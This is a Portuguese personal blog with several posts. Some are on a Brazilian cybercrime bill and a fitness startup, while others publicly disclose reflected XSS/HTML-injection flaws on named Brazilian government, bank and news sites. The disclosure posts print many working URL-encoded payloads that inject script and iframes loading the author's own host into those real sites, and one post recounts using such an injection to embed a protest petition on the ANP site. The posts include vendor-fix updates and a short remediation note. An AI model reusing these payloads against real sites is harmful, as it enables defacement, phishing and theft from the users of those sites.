metaldot

Cuidado para n�o gerar uma legisla��o que s� atenda uma demanda num momento de p�nico

2012-05-16T12:17:00-03:00

Fiquei triste e com medo ao ler que a C�mara aprovou numa vota��o simb�lica (que durou 5 minutos) o Projeto de Lei 2793/11 comandado pelo Deputado Paulo Teixeira (PT-SP) que tipifica crimes cibern�ticos. Fiquei triste porque o Marco Civil da Internet deveria ser discutido e votado primeiro e a� sim depois discutir projetos de criminaliza��o. Mas o Marco Civil passou um bom tempo na gaveta at� come�ar a ser instalado =/

15/05/2012 18:28 - Plen�rio inicia sess�o para votar projeto sobre crimes cibern�ticos
15/05/2012 18:33 - C�mara aprova projeto sobre crimes cibern�ticos

Ao ler a not�cia sobre a vota��o do PL 2793/11, a primeira coisa que pensei foi o caso do vazamento das fotos da atriz Carolina Dieckmann e qual seria a influ�ncia nesse caso, uma vez que n�o � a primeira vez que algo � votado por "clamor p�blico" e/ou "movido pelo p�nico".

"Depois da morte do garoto Jo�o H�lio, de seis anos, no Rio Janeiro, a C�mara dos Deputados acelerou os trabalhos e aprovou, em regime de urg�ncia, altera��es legislativas de combate � criminalidade que estavam engavetadas h� pelo menos um ano. Os tr�s projetos aprovados devem seguir agora para an�lise do Senado Federal e, se n�o sofrerem altera��es, seguir � san��o presidencial."

Nessa correria provocada pelo "clamor p�blico" devido a inseguran�a gerada pelos grandes ve�culos de comunica��o porque um dos criminosos era menor de idade, a maioridade penal baixou para 16 anos e teve gente que pediu para baixar para 13 anos.

Outro exemplo foi a sequ�ncia de ataques DoS em sites .gov.br no ano passado (at� me chamaram de "hacker do bem", para divers�o da Yaso e da Dani). Confesso que achei que o AI-5 Digital do nosso querido Deputado Eduardo Azeredo seria aprovado na mesma semana. Uf�! Ainda bem, n�o foi.

Lembrei do caso do garoto Jo�o H�lio porque quando fui trabalhar na Secretaria de Assuntos Legislativos (SAL) do Minist�rio da Justi�a, o Ricardo Poppi me mostrou um v�deo onde o ex-Secret�rio Pedro Abramovay falava sobre o cuidado para n�o gerar uma legisla��o que s� atenda uma demanda num momento de p�nico (Fica a dica pro Poppi publicar o video).

E a pergunta que fica �, quais s�o as consequ�ncias de aprovar leis no calor do momento?

Para jogar mais lenha na fogueira, "o presidente da C�mara, o Deputado Marco Maia disse que a C�mara precisa construir mecanismos para permitir um filtro entre a "boa e a m� informa��o" (como mentiras) veiculadas em redes sociais. "Precisamos no curto e m�dio prazos aproximar a evolu��o do mundo tecnol�gico e a legisla��o para garantir a liberdade de express�o", disse."

Pelo jeito, ele � mais um Deputado que defende a censura da rede e � a favor do AI-5 Digital.

Primeiro pr�mio da Fitnova

2012-03-25T18:20:00-03:00

No dia 20 de mar�o aconteceu o desafio Startup Minas Meetup e a Fitnova foi o projeto campe�o. Em segundo lugar ficou Nota de Corte e em terceiro Meritt, Guiando Telecom e Meliuz.

A organiza��o do desafio (Circuito Startup) classificou dez projetos e sorteou dois projetos durante o evento. Cada projeto tinha 2 minutos de apresenta��o para vender o peixe para uma banca de jurados composta por investidores e empreendedores, entre eles Rodolfo Zhouri (Endeavor), Gustavo Ziller (Aorta) e Simon Olson (Google).

Sobre o Startup Minas Meetup:

"O Startup Belo Horizonte � um encontro entre Empreendedores, Investidores, Incubadoras, Aceleradoras de Neg�cios, M�dia e interessados. Possui formato Happy Hour, facilitando e estimulando o di�logo entre um grande n�mero de pessoas. Cada participante recebe uma identifica��o (nome, empresa e categoria), a partir da�, pode circular pelo sal�o e conversar com outras pessoas, de acordo com seu interesse. Trata-se de uma excelente oportunidade para ampliar sua rede de contatos, conhecendo pessoas com novas id�ias, neg�cios inovadores ou mesmo investidores � procura de talentos."

Fitnova - Personal Trainer 2.0, Treinos Online e Fichas de Muscula��o

2012-02-27T10:16:00-03:00

No final do m�s de Agosto de 2011 sai de Bras�lia e voltei a morar em BH para participar da elabora��o e do desenvolvimento do Fitnova. Ap�s alguns meses de trabalho duro junto com C�sar Calixto, Gabriel Torres, Rafael Jorge e Saulo Medeiros, colocamos o projeto no ar no dia 12 de janeiro de 2012.

O projeto inicial era um prot�tipo com poucas coisas, mas ao longo do tempo mudamos e acrescentamos muitas coisas. A vers�o inicial j� saiu com cara de produto e n�o de um prot�tipo. Fizemos um cat�logo de exerc�cios com mais de 1200 exerc�cios com v�deos e mais de 10.000 programas de treinamentos.

Como funciona?

Ap�s cadastro no site, � necess�rio preencher um question�rio com 15 perguntas para descobrirmos o seu n�vel de condicionamento f�sico atual. Terminando essa etapa, temos um segundo question�rios com 8 perguntas sobre o objetivos do seu treino. Com os dois question�rios respondidos, um treino � selecionado com as suas caracter�sticas. Da� � come�ar a treinar, movimente-se!

Sobre a Fitnova:

"A Fitnova surgiu para oferecer uma plataforma tecnol�gica com o prop�sito de combater o sedentarismo. A Fitnova acredita que todas as pessoas interessadas em praticar uma atividade devem receber o que h� de mais atual na ci�ncia do treinamento baseado em princ�pios cient�ficos, independente da condi��o social. Nossa filosofia principal � atuar como uma ferramenta de combate ao sedentarismo e a filosofia que norteia nossos trabalhos � a disponibiliza��o de treinamentos de alta qualidade desenvolvidas por experts para todos que podem ou n�o pagar."

V�rios bancos com falha de seguran�a (A saga continua)

2011-05-25T17:33:00-03:00

Durante a entrevista que concedi a Rede Brasil Atual me perguntaram se eu tinha testado a falha em outros sites de bancos, eu respondi que n�o, que a minha inten��o era os sites dos Minist�rios. Mas quando cheguei em casa (j� falei que sou curioso) comecei a testar em alguns bancos.

Logo j� apareceram alguns:

Banco Alfa
BRB (Banco de Bras�lia)
BANESE (Banco do Estado de Sergipe)
BANESTES (Banco do Estado do Esp�rito Santo)
BANRINSUL (Banco do Estado do Rio Grande do Sul)
BRP (Banco Ribeir�o Preto)
BSMB (Banco Sumitomo Mitsui Brasileiro)

Os bancos gastam muito dinheiro com seguran�a e sempre vendem aquela velha falsa sensa��o de seguran�a para os clientes. Todos os sites que acessei foram via https, aquele cadeado de seguran�a que aparece no Navegador, o que n�o quer dizer nada, se o banco n�o faz a parte dele.

Al�m dos bancos, alguns outros sites .gov.br:

ANVISA (Ag�ncia Nacional de Vigil�ncia Sanit�ria)
TCEMG (Tribunal de Contas do Estado de Minas Gerais)

Outras empresas:

IG
UNIMED

Da mesma forma que fiz antes (Seguran�a Nacional), enviei email para todos os �rg�os envolvidos e estou aguardando alguma resposta. Happy Hack!

Screenshots:

Bancos

Banco Alfa	BANESE - Banco do Estado de Sergipe	BANESTES - Banco do Estado do Esp�rito Santo
BANRINSUL - Banco do Estado do Rio Grande do Sul	BRB - Banco de Bras�lia	BRP - Banco Ribeir�o Preto
BSMB (Banco Sumitomo Mitsui Brasileiro)

.gov.br

ANVISA - Ag�ncia Nacional de Vigil�ncia Sanit�ria

TCEMG - Tribunal de Contas do Estado de Minas Gerais

Outras empresas

UNIMED

Segue os links com as p�ginas alteradas, para confirmar

Bancos

* Banco Alfa (ou sem JavaScript)
https://wwws.alfanet.com.br/busca.aspx?__VIEWSTATE=
* BANESE - Banco do Estado de Sergipe (ou sem JavaScript)
https://wwws.banese.com.br/netbanking/index.jsp?Agencia=">
* BANESTES - Banco do Estado do Esp�rito Santo (ou sem JavaScript)
https://wwws.banestes.com.br/cgi-bin/IB_Login?gb=passa&ct=">
* BANRINSUL - Banco do Estado do Rio Grande do Sul (ou sem JavaScript) (Fixed! Corrigido!)
https://www.banrisul.com.br/bob/link/BOBW12HW_busca.asp?palavra=
* BRB - Banco de Bras�lia (ou sem JavaScript)
https://banknet.brb.com.br/brbBanknet/conteudoIframe.jsp?usuario=&ageconta=">
* BRP - Banco Ribeir�o Preto (ou sem JavaScript)
https://netbanking.brp.com.br/NetBanking/c_brp.asp?NumConta=">
* BSMB - Banco Sumitomo Mitsui Brasileiro (ou sem JavaScript)
http://www.smbcgroup.com.br/searchBrasilp/?SearchView&Query=

.gov.br

* ANVISA - Ag�ncia Nacional de Vigil�ncia Sanit�ria (ou sem JavaScript)
https://sngpc.anvisa.gov.br/AcessoPersistir.asp?senha=a&email=
* TCEMG - Tribunal de Contas do Estado de Minas Gerais
http://www.tce.mg.gov.br/?cod_secao=5P&tipo=2&url=Pesquisa_Processo.asp&cod_secao_menu=5K&cpf=">

Outras empresas

* IG (ou sem JavaScript)
http://busca.igbusca.com.br/app/search?first_o=IG&q=">
* UNIMED (ou sem JavaScript)
http://www.unimed.com.br/pct/index.jsp?cd_canal=49146&cd_secao=49103&query=">

UPDATE 24/05/2001 - 14h03

Mensagem do BANRINSUL:

Prezado Marcelo,

Esta vulnerabilidade j� havia sido identificada pelos nossos t�cnicos e estava em processo de corre��o.

Gra�as ao seu comunicado este procedimento foi priorizado e a vulnerabilidade corrigida.

Agradecemos seu contato.

UPDATE 24/05/2001 - 18h00

BANESTES corrigiu pela metade a falha, retirando o m�todo GET e deixando o POST =/

Al�m disso, existem outras URLs e par�metros com a falha que voc� pode testar aqui e aqui.

UPDATE 25/05/2001 - 11h15

BRP corrigiu pela metade a falha (voc� pode ver aqui), mas j� agradeceu:



Marcelo,

O Banco BRP agradece pela sua informa��o.

Att.

Tecnologia da Informa��o

Banco BRP

UPDATE 25/05/2001 - 15h35
BRP corrigiu tudo

Seguran�a Nacional

2011-06-07T19:15:00-03:00

De: "Marcelo Jorge Vieira"
Para: "ANP Imprensa" , "CAIXA - Imprensa" , "Jorge Fontes Hereda" , "Joaquim Lima de Oliveira" , "CEB - Comunica��o Social" , "Conselho de Consumidores da CEB" , "Glaucius Oliva" , "CNPq Ascom" , "Ol�mpio Cruz" , "MMA Ascom" , "Maria Lucia Muniz" , "MCT Ascom" , "Maristela Rangel Pinto" , "Nanan Catal�o" , "Denise Mantovani" , "MDA Ascom" , "Nunzio Briguglio Filho" , "MEC Ascom" , "Ramiro Alves" , "MF Ascom" , "Gerusa Barbosa" , "MMA Ascom" , "Ant�nio Carlos" ,"MME Ascom" , "Vanice Cioccari" , "MJ Ascom" , "PBH Ascom" , "Walter Carlos Auad Sotomayor" , "Turismo Ascom" , "Selvino Heck" , "Casa Civil da Presid�ncia da Rep�blica" , "Benjamin Zymler" , "Augusto Nardes" , "Estad�o - Fale com" , "Estad�o - Portal" , "Nelson Nunes" , "Carlos Alencar" , "Ulisses Oliveira" , "Teodomiro Braga" , "F�bio A. Santos" , "Luiz Fernando Rocha" , "Mylena Fiori" , "Carta Maior - Reda��o" , "Terra - Abuse" , "Terra - Editorial" , "Roberto Borges Martins" , "Hugo Teixeira" , "Franco Brostel Nunes Leal" , "Luiz Silv�rio Pereira Meireles" , "Rodolfo Fernandes" , "Maria Fernanda Delmas" , "Asc�nio Seleme" , "Folha Emerg�ncia" , "Folha Poder" , "Minist�rio da Defesa" , "Minist�rio da Defesa - Ascom" ,

Ol�,

No in�cio do m�s de Abril, eu descobri uma falha no site da ANP (Ag�ncia Nacional do Petr�leo), que eu explorei para mudar a visualiza��o do site, inserindo um formul�rio, um abaixo-assinado, onde um visitante poderia assinar seu nome como uma forma de protesto aos altos pre�os dos combust�veis.

Essa falha (prim�ria) n�o altera o conte�do do site, apenas muda a visualiza��o e s� funciona, se o usu�rio clicar em um link "batizado" com par�metros espec�ficos, como, por exemplo, o link abaixo usado para inserir o formul�rio no site da ANP: http://www.anp.gov.br/?q= (o link n�o funciona mais, o pessoal da ANP j� consertou a falha nesse ponto).

No meu blog, tem um relato explicando melhor o caso da ANP e o Mundo Bugado.

Como sou curioso, quis saber se outros sites tamb�m apresentavam a mesma falha. Minha m�e sempre diz: Quem procura, acha! E � claro que eu achei e n�o foram poucos.

.gov.br:

ANP (Ag�ncia Nacional do Petr�leo, G�s Natural e Biocombust�veis)
Brazilian Tourism Portal (Minist�rio do Turismo)
CAIXA (O banco que acredita nas pessoas)
CEB (Companhia Energ�tica de Bras�lia)
Dom�nio P�blico (Minist�rio da Educa��o)
Embratur (Minist�rio do Turismo)
MF (Minist�rio da Fazenda)
MINC (Minist�rio da Cultura
MMA (Minist�rio do Meio Ambiente)
MME (Minist�rio de Minas e Energia)
MDA (Minist�rio do Desenvolvimento Agr�rio)
MCT (Minist�rio da Ci�ncia e Tecnologia)
Portal da Transpar�ncia (Presid�ncia)
Plataforma Lattes (CNPq)
SINDEC (Sistema Nacional de Informa��es de Defesa do Consumidor)
TCU (Tribunal de Contas da Uni�o)

Jornal/TV:

Estad�o
Carta Maior
O TEMPO
Di�rio de S�o Paulo
Terra
Rede Minas

O que eu quero com esse email?! Reportar essa falha, porque ela poderia ser explorada de v�rias maneiras:

Uma pessoa mal intencionada poderia substituir a p�gina inicial da CAIXA para "roubar" as contas de alguns clientes.
Usar o site do Minist�rio da Cultura para falar mal da Ministra, uma vez que surgiram v�rios temas relacionados � ela nos �ltimos dias.
Fazer mais uma campanha sobre os altos pre�os dos combust�veis no site da ANP.
Usar o site do Minist�rio da Fazenda para falar que n�o � mais preciso declarar Imposto Renda.
Publicar todas as falsas not�cias no ESTAD�O, no Di�rio de S�o Paulo, no O Tempo, no Terra, na Carta Maior e na Rede Minas.

Com essa cole��o de sites, � bem f�cil criar uma rede de intrigas, verdades ou mentiras, como, por exemplo, "O brasil desistiu de sediar a copa", "O brasil vai vender a Amaz�nia", etc.

Por todos os motivos citados acima, essa falha � uma quest�o de Seguran�a Nacional.

Estou enviando e publicando esse email, porque n�o acredito no contato privado com suas institui��es. A ANP demonstrou muito bem esse ponto ao n�o assumir a falha no site e no sistema de pre�os, e ainda fazer um comunicado sobre um endere�o falso circulando na Internet e ao mesmo tempo retirar o sistema de consulta dos pre�os do ar.

Segue os links com as p�ginas alteradas, para confirmar

.gov.br:

* ')}">ANP (Ag�ncia Nacional do Petr�leo, G�s Natural e Biocombust�veis) (Fixed! Corrigido!)
http://www.anp.gov.br/SITE/acao/estaaqui/?s1=

* Brazilian Tourism Portal (Minist�rio do Turismo)

http://www.braziltour.com/busca.html?search=%22%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/braziltour/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220

%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E

* CAIXA (O banco que acredita nas pessoas)

http://www1.caixa.gov.br/busca/resultados.asp?q2=1&q1=%27%29;}%29;%3C/script%3E%3Ciframe%20src=%22http://metal.mundobugado.org/caixa/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C!--

* CEB (Companhia Energ�tica de Bras�lia)

http://www.ceb.com.br/Ceb/aplicacoes/index.cfm?fuseaction=busca.realizarbusca&pesquisa=%3Ciframe%20src=%22http://metal.mundobugado.org/ceb/%22%20width=%221260%22%20height=%222500%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E

* Dom�nio P�blico (Minist�rio da Educa��o) (Fixed! Corrigido!)

http://www.dominiopublico.gov.br/pesquisa/PesquisaAutorResultadoForm.do?letra=%3Cscript%3Ewindow.onload=function%28%29{document.write%28%22%3Cbody%20style=\%22margin:%200px%200px\%22%3E%3Ciframe%20src=\%22http://metal.mundobugado.org/dominiopublico/\%22%20width=\%221260\%22%20height=\%222100\%22%20frameborder=\%220\%22%20marginheight=\%220\%22%20marginwidth=\%220\%22%20scrolling=\%22no\%22%3E%3C/body%3E%22%29}%3C/script%3E

* ">Embratur (Minist�rio do Turismo)
http://www.embratur.gov.br/site/br/busca/busca.php?palavra=','')">

* MF (Minist�rio da Fazenda) (Fixed! Corrigido!)

http://www.fazenda.gov.br/busca.asp?pesquisa=%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/fazenda/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E%3C!--

* ')}">MINC (Minist�rio da Cultura)
http://fale.cultura.gov.br/sisouvidor/login/formularioLogin.jsp?UsuarioInvalido=

* MMA (Minist�rio do Meio Ambiente)

http://www.mma.gov.br/sitio/index.php?ido=conteudo.pesquisa&busca=%22%3C/h2%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%22%3Cbody%20style=\%22margin:%200px%200px\%22%3E%3Ciframe%20src=\%22http://metal.mundobugado.org/mma/\%22%20width=\%221260\%22%20height=\%222100\%22%20frameborder=\%220\%22%20marginheight=\%220\%22%20marginwidth=\%220\%22%20scrolling=\%22no\%22%3E%3C/body%3E%22%29}%3C/script%3E

* MME (Minist�rio de Minas e Energia)

http://www.mme.gov.br/mme/buscaresult.html?field=content&index=indice_mme&query=%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/mme/%22%20width=%221260%22%20height=%223500%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E

* MDA (Minist�rio do Desenvolvimento Agr�rio)

http://mda.gov.br/sistemas/sistemasmda/index.php?msg=%3Cscript%3E$%28function%28%29{%20$%28%22body%22%29.empty%28%29.append%28%22%3Cbody%20style=%27margin:%200px%200px%27%3E%3Ciframe%20src=%27http://metal.mundobugado.org/mda/%27%20width=%271260%27%20height=%273200%27%20frameborder=%270%27%20marginheight=%270%27%20marginwidth=%270%27%20scrolling=%27no%27%3E%3C/body%3E%22%29%20}%29

* MCT (Minist�rio da Ci�ncia e Tecnologia)

http://www.mct.gov.br/index.php?action=/html/objects/search_result&searchquery=%3C/td%3E%3C/tr%3E%3C/table%3E%3Cscript%3Ewindow.onload%20=%20function%28%29%20{%20document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/mct/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29%20}%3C/script%3E%3C!--

* ">Portal da Transpar�ncia (Presid�ncia)
http://www.portaltransparencia.gov.br/despesasdiarias/resultado?consulta=rapida&periodoInicio=">

* Plataforma Lattes (CNPq)

http://buscatextual.cnpq.br/buscatextual/busca.do?metodo=buscar&textoBusca=%3Cscript%3Ewindow.onload=function%28%29{document.write%28%22%3Cbody%20style=\%22margin:%200px%200px\%22%3E%3Ciframe%20src=\%22http://metal.mundobugado.org/cnpq\%22%20%20width=\%221260\%22%20height=\%222100\%22%20frameborder=\%220\%22%20marginheight=\%220\%22%20marginwidth=\%220\%22%20scrolling=\%22no\%22%3E%3C/body%3E%22%29}%3C/script%3E

* SINDEC (Sistema Nacional de Informa��es de Defesa do Consumidor) (Fixed! Corrigido!)

https://sindecbh.pbh.gov.br:444/sindecconsulta/?msg=%3C/td%3E%3C/tr%3E%3C/table%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/sindec/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E%3C!--

* TCU (Tribunal de Contas da Uni�o)

https://login.tcu.gov.br/sso/jsp/login.jsp?site2pstoretoken=&p_submit_url=&p_cancel_url=&locale=%22%3E%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http:%2F%2Fmetal.mundobugado.org%2Ftcu%22%20width=%221260%22%20height=%226000%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C%2Fbody%3E

Jornal/TV:

* Estad�o (Fixed! Corrigido!)

http://www.estadao.com.br/busca/%3C%2Ftitle%3E%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http:%2F%2Fmetal.mundobugado.org%2Festadao%22%20width=%221260%22%20height=%226000%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C%2Fbody%3E

* Carta Maior

http://cartamaior.com.br/templates/buscaExecutar.cfm?busca=%3C/title%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/cartamaior/%22%20width=%221260%22%20height=%225100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E%3C!--

* O TEMPO

http://www.otempo.com.br/videos/lista/?busca=%22%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/otempo/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E

* ')}">Di�rio de S�o Paulo
http://www.diariosp.com.br/?id=%2Fbusca.php&ds_busca=

* Terra (Fixed! Corrigido!)

http://buscador.terra.com.br/Default.aspx?source=Search&ca=s&query=%3C/title%3E%3Ciframe%20src=%22http://is.gd/lCgKDa%22%20width=1260%20height=2100%20frameborder=0%20scrolling=%22no%22%3E%3C!--

* Rede Minas

http://www.redeminas.mg.gov.br/search/node/%22%3E%3C/a%3E%3Cscript%3Ewindow.onload=function%28%29%7Bdocument.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http%3A/%252Fmetal.mundobugado.org/redeminas/%22%20width=%221260%22%20height=%225100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29%7D%3C/script%3E

O que � HTML Injection ou XSS (Cross-site scripting)?

HTML Injection � um tipo de vulnerabilidade encontrada normalmente em sistemas Web e � explorada com a inser��o de c�digo HTML/JavaScript nos par�metros de um formul�rio, por exemplo. N�o faz nenhuma mudan�a nos arquivos do servidor, apenas muda a visualiza��o dos dados para o usu�rio.

O que � HTML?

"HTML (acr�nimo para a express�o inglesa HyperText Markup Language, que significa Linguagem de Marca��o de Hipertexto) � uma linguagem de marca��o utilizada para produzir p�ginas na Web" -- Wikip�dia

O que � JavaScript?

JavaScript � uma linguagem de programa��o muito utilizada para produzir p�ginas na Web.

Como resolver?

Remover todas as tags HTML de todos os par�metros. Para cada linguagem utilizada para produzir o site, existe uma forma de remover as tags: ASP, PHP, Python, Java.

-------

UPDATE 17/05/2011 - 20h34
ANP, Dominio P�blico e Terra corrigiram as "brechas".

UPDATE 18/05/2011 - 00h07
ESTAD�O corrigiu a "brecha".

UPDATE 18/05/2011 - 11h12

Caro Marcelo,

A falha mencionada foi corrigida, agradecemos a notifica��o.

Atenciosamente,



Lucas Betti Domingues

Equipe de Seguran�a Terra - Depto. de Abuse

abuse@terra.com.br

SAN - Servico de Atendimento Nacional

Fax: (51) 3287-9087

UPDATE 19/05/2011 - 11h33
SINDEC corrigiu a "brecha".

UPDATE 23/05/2011 - 23h32

A CAIXA corrigiu a brecha pela metade, mas j� foi um avan�o. Voc�s podem testar aqui e aqui para comprovar que ainda existe a falha.

UPDATE 07/06/2011 - 17h08

O MF (Minist�rio da Fazenda) corrigiu a brecha. De um jeito tosco, mas corrigiu... agora eles retiram da busca os caracteres "<" e ">"

Quem procura, acha!

2011-05-17T03:36:00-03:00

Voc� j� tentou levantar os tapetes no corredor pra ver se tem alguma chave embaixo?

Depois do HTML Injection no site da ANP, fiquei com a pulga atr�s da orelha, curioso, pra saber se outros sites tamb�m apresentavam a mesma falha. Minha m�e sempre diz: Quem procura, acha! E � claro que eu achei e n�o foram poucos.

.gov.br

ANP (Ag�ncia Nacional do Petr�leo, G�s Natural e Biocombust�veis)	Brazilian Tourism Portal	CAIXA (O banco que acredita nas pessoas)
CEB (Companhia Energ�tica de Bras�lia)	Dom�nio P�blico	Embratur
MF (Minist�rio da Fazenda)	MINC (Minist�rio da Cultura)	MMA (Minist�rio do Meio Ambiente)
MME (Minist�rio de Minas e Energia)	MDA (Minist�rio do Desenvolvimento Agr�rio)	Portal da Transpar�ncia
Plataforma Lattes	SINDEC (Sistema Nacional de Informa��es de Defesa do Consumidor)	TCU (Tribunal de Contas da Uni�o)

Jornais

Carta Maior	Estad�o	Terra
Di�rio de S�o Paulo	O TEMPO	Rede Minas

Composi��o dos pre�os dos combust�veis: qual � a verdade?

2011-05-05T13:05:00-03:00

Imagem via blog da Petrobras

Imagem via campanha para justificar os altos pre�os dos combust�veis

E a�, qual � a verdade?

Ag�ncia Nacional do Petr�leo (ANP) e o mundo bugado

2011-04-12T00:20:00-03:00

Ap�s duas semanas revoltado com o alto pre�os dos combust�veis, decidi na madrugada do dia 05/04 fazer um post no twitter e identi.ca mostrando como foi abusivo o aumento do etanol (�lcool) aqui em Bras�lia, que passou de R$ 2,02 para R$ 2,83.

Comentando com o Thiago Silva, ele falou que existia um sistema onde era poss�vel visualizar os pre�os dos combust�veis em todo o Brasil. Acessamos o site da ANP e realmente o sistema possu�a os pre�os atualizados por cidades e per�odos. Observei que o formul�rio de pesquisa usava o m�todo POST e n�o gerava uma URL amig�vel impossibilitando que eu mostrasse como estava caro os pre�os em Bras�lia. Como tenho conhecimento em HTML, comecei a ler o c�digo do formul�rio para tentar gerar uma URL via m�todo GET para conseguir publicar o link sobre o pre�o dos combust�veis em Bras�lia, para que outras pessoas acessassem diretamente a tabela de pre�os ao inv�s de preencher o formul�rio.

Acabei descobrindo que os campos "hidden", como por exemplo, o campo "selMunicipio" estava preenchido assim "1778*BRASILIA" e o campo "selSemana" estava "615*De 27/03/2011 a 02/04/2011". Percebendo isso, minha primeira rea��o foi tentar alterar o campo "selMunicipio" de "1778*BRASILIA" para "1778*A", e n�o � que apareceu escrito "A" ao inv�s de "BRASILIA", l� no site da ANP?! Mudei o "selMunicipio" para "1778*BRASILIA A CIDADE SEM LEI" e o "selSemana" para "615*De 27/03/2011 a 02/04/2011~INFINITO E ALEM" e publiquei a URL modificada aqui [1] e aqui [2].

Fiz mais um teste tentando colocar c�digo HTML junto ao texto na URL e tamb�m funcionou. Ooooops ficou mais s�rio a falha de seguran�a.

Em paralelo aos testes, estava acontecendo muita conversa sobre os pre�os altos dos combust�veis e muita gente estava usando a hashtag combustivelmaisbaratoja.

Tive a ideia de fazer um abaixo-assinado e contribuir no assunto. Pensei em alguns m�todos de como inser�-lo dentro da p�gina da ANP, uma vez que eu consigo inserir c�digo HTML na URL. Alguns minutos conversando com o Thiago, tive a ideia de usar um iframe. Comecei a desenvolver o formul�rio usando python-pesto, python-sqlalchemy e em alguns minutos depois estava pronto. Discutimos sobre onde hospedar e quais seriam as implica��es. Decidimos hospedar o formul�rio no nosso pr�prio dom�nio mundobugado.org, numa forma de assumir, porque a nossa inten��o era tamb�m demonstrar a falha no site e n�o s� protestar.

Publiquei [1] e [2] a URL com o iframe e v�rias pessoas repassaram o link.

http://www.anp.gov.br/preco/prc/Resumo_Por_Municipio_Posto.asp?Tipo=2&cod_Semana=615&desc_Semana=A&selCombustivel=643*A&selMunicipio=1778*BRASILIA%20A%20CIDADE%20SEM%20LEI&selSemana=615*De%2027/03/2011%20a%2002/04/2011~INFINITO%20E%20ALEM%3Ciframe%20src=%27http://mundobugado.org/anp%27%20height=%27500%27%20width=%27500%27%3E%3C/iframe%3E%3C!--

imagem via yaso:

No dia seguinte, dia 06/04, a ANP retirou o Sistema de Pesquisa de Pre�os do ar. Procurei saber o motivo, se era por nossa causa, e era. No microblog tinha o seguinte alerta:

Um alerta mentiroso, uma vez que usamos a pr�pria URL do site da ANP e n�o algo como "anp.com.br" ou "anp.net", etc. (Um d�vida minha, qual � a rela��o entre formul�rio falso e o sistema estar em manuten��o?! Pura desculpa para uma falha deles?!). Algum tempo depois, v�rios sites replicaram o alerta [1], [2], [3], [4].

Olhei alguns c�digos do site da ANP e encontrei outras brechas [1] e [2]. Agora, n�o s� o Sistema de Pesquisa de Pre�os estava com a falha, mas a maior parte dos formul�rios do site, incluindo a busca principal. ANP, agora voc�s v�o retirar o site todo do ar? E v�o usar o que como desculpa pela mal programa��o?!

Optei agora por n�o espalhar a URL com o iframe e avisei [1] e [2] a ANP sobre as falhas, mas at� agora n�o recebi uma resposta.

O lado negativo de tudo isso, � que uma falha boba, de f�cil solu��o, deixou o sistema 24h ~ ao infinito e al�m fora do ar. Me deixando com a pulga atr�s da orelha, pensando que mesmo que a TI da ANP demore pra corrigir a falha, o lado pol�tico de deixar o sistema fora do ar nesse momento de grande procura dos dados. Uma pena...

Espero ter esclarecido o que aconteceu. Happy hack!

ATUALIZA��O: 08/04/2011 18h20

O Sistema de Pesquisa de Pre�os esta no ar novamente e parece corrigido. Mas reparei que a busca do site sumiu, que foi o meu outro bug report. Ser� que a ANP vai fazer uma nota sobre o assunto?!

ATUALIZA��O: 08/04/2011 20h52

A busca no site da ANP ainda n�o voltou =/ Mas sexta-feira, numa hora dessas, deve ficar o fim de semana todo sem a busca. Espero que corrijam todas as falhas do mesmo tipo que levantei sobre HTML Injection e n�o s� os dois formul�rios bugados que citei nesse "artigo". Para isso, tenho mais um formul�rio bugado para testar, agora � esperar pra ver.

ATUALIZA��O: 11/04/2011 22h18

Olhei de manh�, de tarde, mas agora a busca no site ANP est� de volta e corrigida. Mas, e as outras falhas, quando ser�o corrigidas?!

JuntaDados e o Hall da vergonha

2010-10-01T17:12:00-03:00

